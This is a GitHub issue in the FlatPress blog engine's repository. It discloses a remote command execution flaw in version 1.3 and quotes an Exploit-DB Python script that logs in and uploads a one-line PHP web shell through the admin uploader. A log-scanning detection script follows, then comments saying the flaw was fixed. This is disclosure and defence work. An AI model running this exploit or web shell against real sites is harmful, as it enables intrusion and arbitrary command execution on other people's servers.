flatpressblog / flatpress

FlatPress is a lightweight, easy-to-set-up flat-file blogging engine.
https://flatpress.org
GNU General Public License v2.0

EDB-ID: 51997 | The login area and the uploader is vulnerable to RCE #451

Closed Fraenkiman closed 1 month ago

Fraenkiman commented 1 month ago

Reported by Ahmet Ümit BAYRAM on https://www.exploit-db.com/

Thank you for reporting

Content:

```python
# Exploit Title: FlatPress v1.3 - Remote Command Execution
# Discovered Date: 19.04.2024
# Vendor Homepage: https://www.flatpress.org
# Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip
# Tested Version: 1.3 (latest)
# Tested on: MacOS

import random
import string
import sys
import time

import requests


def random_string(length=5):
    """Generate a random lowercase string."""
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for _ in range(length))


def login_and_upload(base_url, username, password):
    filename = random_string() + ".php"
    login_url = f"http://{base_url}/login.php"
    upload_url = f"http://{base_url}/admin.php?p=uploader&action=default"

    with requests.Session() as session:
        # Exploiting
        print("Exploiting...")
        time.sleep(1)

        # Login attempt
        login_data = {
            'user': username,
            'pass': password,
            'submit': 'Login'
        }
        print("Logging in...")
        response = session.post(login_url, data=login_data)
        time.sleep(1)

        if "Logout" in response.text:
            print("Login Successful!")
        else:
            print("Login Failed!")
            print(response.text)
            return

        # File upload attempt
        print("Shell uploading...")
        time.sleep(1)

        # Form data and files
        files = {
            'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'),
        }
        form_data = {
            '_wpnonce': '9e0ed04260',
            '_wp_http_referer': '/admin.php?p=uploader',
            'upload': 'Upload'
        }

        response = session.post(upload_url, files=files, data=form_data)

        if "File(s) uploaded" in response.text or "Upload" in response.text:
            shell_url = f"http://{base_url}/fp-content/attachs/(unknown)"
            print(f"Your Shell is Ready: {shell_url}")
            time.sleep(1)
            print(f"Shell Usage: {shell_url}?0=command")
        else:
            print("Exploit Failed!")
            print(response.status_code, response.text)


# Example usage: python script.py siteadi.com username password
if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: script.py <base_url> <username> <password>")
    else:
        base_url, username, password = sys.argv[1:]
        login_and_upload(base_url, username, password)
```

Link to the original report
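For operators checking whether a 1.3 instance was hit before upgrading, here is an added detection example (not part of the report or of FlatPress) that scans web server access logs for the pattern the script above leaves behind: a POST to the uploader followed by requests that execute a `.php` file under `/fp-content/attachs/`. The log lines are constructed samples in combined log format; the `find_webshell_indicators` function and its regexes are my own.

```python
import re

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Apr/2024:10:00:01 +0000] "POST /login.php HTTP/1.1" 302 0
203.0.113.5 - - [19/Apr/2024:10:00:03 +0000] "POST /admin.php?p=uploader&action=default HTTP/1.1" 200 5120
203.0.113.5 - - [19/Apr/2024:10:00:05 +0000] "GET /fp-content/attachs/qwzrt.php?0=id HTTP/1.1" 200 64
198.51.100.9 - - [19/Apr/2024:10:01:00 +0000] "GET /fp-content/attachs/photo.jpg HTTP/1.1" 200 20480
198.51.100.9 - - [19/Apr/2024:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 9000
"""

# Minimal parser for the combined log format: client IP, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Any request that executes a PHP file from the attachment directory is suspicious:
# attachments should be static files, never server-side scripts.
ATTACH_PHP_RE = re.compile(r'^/fp-content/attachs/[^/?]+\.php\d?(\?|$)', re.IGNORECASE)


def find_webshell_indicators(log_text):
    """Return one finding per PHP request under the attachment directory.

    Each finding records the client IP, the requested path, the HTTP status and
    whether that same IP was seen POSTing to the uploader earlier in the log.
    A PHP hit without a prior upload is still reported, since the upload may
    have come from a different address.
    """
    uploader_clients = set()
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed or unrelated lines
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        if method == "POST" and path.startswith("/admin.php?p=uploader"):
            uploader_clients.add(ip)
        elif ATTACH_PHP_RE.match(path):
            findings.append({
                "ip": ip,
                "path": path,
                "status": status,
                "after_upload": ip in uploader_clients,
            })
    return findings


if __name__ == "__main__":
    for finding in find_webshell_indicators(SAMPLE_LOG):
        print(finding)
```

A status of 200 on such a request means the script was executed by the server, so the file under `fp-content/attachs/` should be preserved for forensics and then removed.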

justrudra commented 1 month ago

@Fraenkiman So your FlatPress-powered blog's contact form does send emails to you successfully. ;) I had tried to reach you with this report that day and took the help of your contact form. Since the date of the release of this report was before the release of FlatPress 1.3.1, I was trying to understand if this was taken care of. But nonetheless it is good that this issue is on your radar now.

Fraenkiman commented 1 month ago

Closed with 472d0b1 and b8dc792